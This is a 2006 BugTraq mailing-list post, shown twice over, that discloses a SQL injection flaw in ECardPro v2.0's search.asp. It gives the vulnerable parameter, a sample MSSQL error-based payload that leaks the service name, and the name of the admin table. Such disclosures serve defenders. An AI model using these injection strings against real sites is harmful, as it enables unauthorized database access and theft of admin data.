BugTraq
Back to list
|
Post reply
ECardPro v2.0(search.asp) Remote SQL Injection Vulnerability
Sep 17 2006 01:29PM
ajannhwt hotmail com
Vulnerability Report
************************************************************************
*******
# Title : ECardPro v2.0(search.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page : http://www.keyvan1.com
# Exploit;
************************************************************************
*******
Data: MSSQL
###http://[target]/[path]/search.asp?keyword='[SQL HERE]
Example: search.asp?keyword='AND%201=convert(int,%20@@servicename) ==> MSSQL Service Name
Admin Table: "admin"
etc(systemtables,union,update,select)......
# ajann,Turkey
# ...
# Im not Hacker!
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
************************************************************************
*******
# Title : ECardPro v2.0(search.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page : http://www.keyvan1.com
# Exploit;
************************************************************************
*******
Data: MSSQL
###http://[target]/[path]/search.asp?keyword='[SQL HERE]
Example: search.asp?keyword='AND%201=convert(int,%20@@servicename) ==> MSSQL Service Name
Admin Table: "admin"
etc(systemtables,union,update,select)......
# ajann,Turkey
# ...
# Im not Hacker!
[ reply ]